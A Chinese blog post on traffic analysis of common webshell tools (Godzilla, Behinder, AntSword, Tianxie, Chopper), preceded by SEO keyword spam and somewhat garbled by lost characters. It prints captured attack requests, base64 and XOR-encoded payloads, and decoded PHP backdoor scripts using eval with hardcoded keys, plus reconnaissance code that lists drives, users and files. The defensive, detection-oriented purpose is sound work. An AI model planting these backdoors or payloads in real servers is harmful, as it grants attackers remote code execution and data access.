珠海哪里学网站开发,网站建设好后怎么更新内容,网络公司的网页设计,百度动态排名软件免责声明#xff1a;本文仅作分享#xff01; 对于常见的webshell工具#xff0c;就要知攻善防#xff1b;后门脚本的执行导致webshell的连接#xff0c;对于默认的脚本要了解#xff0c;才能更清晰#xff0c;更方便应对。
#xff08;这里仅针对部分后门代码进行流量… 免责声明本文仅作分享 对于常见的webshell工具就要知攻善防后门脚本的执行导致webshell的连接对于默认的脚本要了解才能更清晰更方便应对。
这里仅针对部分后门代码进行流量分析
瑕疵处请提出您宝贵的意见~ 目录
哥斯拉流量
流量包
工具解密
冰蝎流量
后门代码
解密
蚁剑流量
流量包
数据传输方式
编辑
天蝎流量
后门代码
工具解密
菜刀流量 哥斯拉流量
3.x - 4.x:
要知道密码密钥才能将传输的密文转换为明文。
流量包
POST /uploads/shell.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Cookie: PHPSESSIDe30bpdvj90mp4gcgo3ukjcoa3t;
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Host: 192.168.155.22
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 1413hackereval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3BhhhhackerLOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3DHTTP/1.1 200 OK
Host: 192.168.155.22
Date: Tue, 08 Oct 2024 08:57:26 GMT
Connection: close
X-Powered-By: PHP/8.2.23
Set-Cookie: PHPSESSIDe30bpdvj90mp4gcgo3ukjcoa3t; path/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charsetUTF-87ba0e8f6b3da4a83LOk/NjEyMDhkNkjfav75hiqH9YzMocx4BtpMDVm1f2ed56a3adc98dc
对传输的数据进行解密
hackereval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3BhhhhackerLOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3D---hackereval(base64_decode(strrev(urldecode(K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD))));hhhhackerLOk/NjEyMDhkNSjeJf73gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8qMYHqreX0b5m/W0pmZ1aAZACuehv4n/JL/kuVddg2HueKnpA//39dahYjCIqf6FYmI3Ng---
DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2hoaGhhY2tlcic7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nNzNiNzYxMjA4ZDVjMDVmMic7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K
继续解密得后门脚本 session_start();
set_time_limit(0);
error_reporting(0);
function encode($D,$K){for($i0;$istrlen($D);$i) {$c $K[$i115];$D[$i] $D[$i]^$c;}return $D;
}
$passhhhhacker;
$payloadNamepayload;
$key73b761208d5c05f2;
if (isset($_POST[$pass])){$dataencode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payloadencode($_SESSION[$payloadName],$key);if (strpos($payload,getBasicsInfo)false){$payloadencode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(run($data),$key));echo substr(md5($pass.$key),16);}else{if (strpos($data,getBasicsInfo)!false){$_SESSION[$payloadName]encode($data,$key);}}
}----》得到
$passhhhhacker;
$key73b761208d5c05f2;
在流量包中找传输的数据进行相应的解密
7ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc
工具解密 冰蝎流量
3.x
base64 AESiv key base64
后门代码
?php
error_reporting(0);
session_start();$keye45e329feb5d925b; //该密钥为连接密码32位md5值的前16位默认连接密码rebeyond$_SESSION[k]$key;session_write_close();$postfile_get_contents(php://input);if(!extension_loaded(openssl)){$tbase64_.decode;$post$t($post.);for($i0;$istrlen($post);$i) {$post[$i] $post[$i]^$key[$i115]; }}else{$postopenssl_decrypt($post, AES128, $key);}$arrexplode(|,$post);$func$arr[0];$params$arr[1];class C{public function __invoke($p) {eval($p.);}}call_user_func(new C(),$params);
?解密 base64 AESiv key base64
IV默认为 0-9 a-f
解密 ---》 最后返回的数据再base64一下即可。 蚁剑流量
流量包 POST /1.php HTTP/1.1
Host: 192.168.19.128
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1668
Connection: closerawQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmI2OTdiZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICIzOSIuIjM3MCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMzdkMGNlIi4iZDBlYWZiIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3Dx%40eval(%40base64_decode(%24_POST%5Braw%5D))%3B
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Wed, 13 Nov 2024 03:13:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.2939370RDovcGhwc3R1ZHlfcHJvL1dXVy9kaWd1bwlDOkQ6CVdpbmRvd3MgTlQgREVTS1RPUC1QRVNMNURSIDYuMiBidWlsZCA5MjAwIChVbmtub3cgV2luZG93cyB2ZXJzaW9uIEJ1c2luZXNzIEVkaXRpb24pIGk1ODYJQWRtaW5pc3RyYXRvcg37d0ced0eafb
解码
注意前几位为干扰字符
ini_set(display_errors, 0);set_time_limit(0);$opdirini_get(open_basedir);if($opdir) {$ocwddirname($_SERVER[SCRIPT_FILENAME]);$oparrpreg_split(base64_decode(Lzt8Oi8),$opdir);array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!is_writable($item)){continue;};$tmdir$item./.b697bd;mkdir($tmdir);if(!file_exists($tmdir)){continue;}$tmdirrealpath($tmdir);chdir($tmdir);ini_set(open_basedir, ..);$cntarrpreg_split(/\\\\|\//,$tmdir);for($i0;$isizeof($cntarr);$i){chdir(..);};ini_set(open_basedir,/);rmdir($tmdir);break;};};;function asenc($out){return base64_encode($out);};function asoutput(){$outputob_get_contents();ob_end_clean();echo 39.370;echo asenc($output);echo 37d0ce.d0eafb;}ob_start();try{$Ddirname($_SERVER[SCRIPT_FILENAME]);if($D)$Ddirname($_SERVER[PATH_TRANSLATED]);$R{$D} ;if(substr($D,0,1)!/){foreach(range(C,Z)as $L)if(is_dir({$L}:))$R.{$L}:;}else{$R./;}$R. ;$u(function_exists(posix_getegid))?posix_getpwuid(posix_geteuid()):;$s($u)?$u[name]:get_current_user();$R.php_uname();$R. {$s};echo $R;;}catch(Exception $e){echo ERROR://.$e-6····5·····························数据传输方式 --根据对应的编码进行解码。 天蝎流量
后门代码
?php
error_reporting(0);
session_start();
$key900bc885d7553375;
$_SESSION[k]$key;
$postfile_get_contents(php://input);
if(isset($post))
{$datasexplode(\n,$post);$code$datas[0];$tbase64_.decode;$code$t($code.);for($i0;$istrlen($code);$i) {$code[$i] $code[$i]^$key[$i115]; }$arrexplode(|,$code);$func$arr[0];if(isset($arr[1])){$p$arr[1];class C{public function __construct($p) {eval($p.);}}new C($p);}
}
?
---》从中我们可以看出 key base64
密文
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
工具解密 再base64
error_reporting(0);
header(Content-Type: text/html; charsetUTF-8);function getSafeStr($str){$s1 iconv(utf-8,gbk//IGNORE,$str);$s0 iconv(gbk,utf-8//IGNORE,$s1);if($s0 $str){return $s0;}else{return iconv(gbk,utf-8//IGNORE,$str);}
}
function getgbkStr($str){$s0 iconv(gbk,utf-8//IGNORE,$s1);$s1 iconv(utf-8,gbk//IGNORE,$str);if($s1 $str){return $s1;}else{return iconv(utf-8,gbk//IGNORE,$str);}
}function main($path )
{if (stristr(PHP_OS,windows)||stristr(PHP_OS,winnt)){for($i65;$i90;$i){$drivechr($i).:\\;file_exists($drive) ? $driveList$driveList.$drive.,:;}}else{$driveList/;}$currentPathgetcwd()./;$result$driveList.\r\n.$currentPath.\r\n;$pathgetgbkStr($path);if($path ) $path getcwd()./;$allFiles scandir($path);foreach ($allFiles as $fileName) {$fullPath $path . $fileName;if($fileName!..$fileName!.){if (!function_exists(mb_convert_encoding)){$fileNamegetSafeStr($fileName);}else{$fileNamemb_convert_encoding($fileName, UTF-8, mb_detect_encoding($fileName, array(UTF-8,auto)));}if (is_file($fullPath)) {$result$result.$fileName;} else {$result$result.dic:.$fileName;}$result$result.\t.filesize($fullPath);$result$result.\t.substr(base_convert(fileperms($fullPath),10,8),-4);$result$result.\t.date(Y-m-d H:i:s, filemtime($fullPath)).\n;}}echo encrypt($result, $_SESSION[k]);
}function encrypt($data,$key)
{for($i0;$istrlen($data);$i) {$data[$i] $data[$i]^$key[$i115]; }return $data;
}
$randmystrsfbygfxohbkbt;
main($pathC:/); 菜刀流量
主要就是一句话密码base64 z0,z1,z2 等等 传输返回的数据。
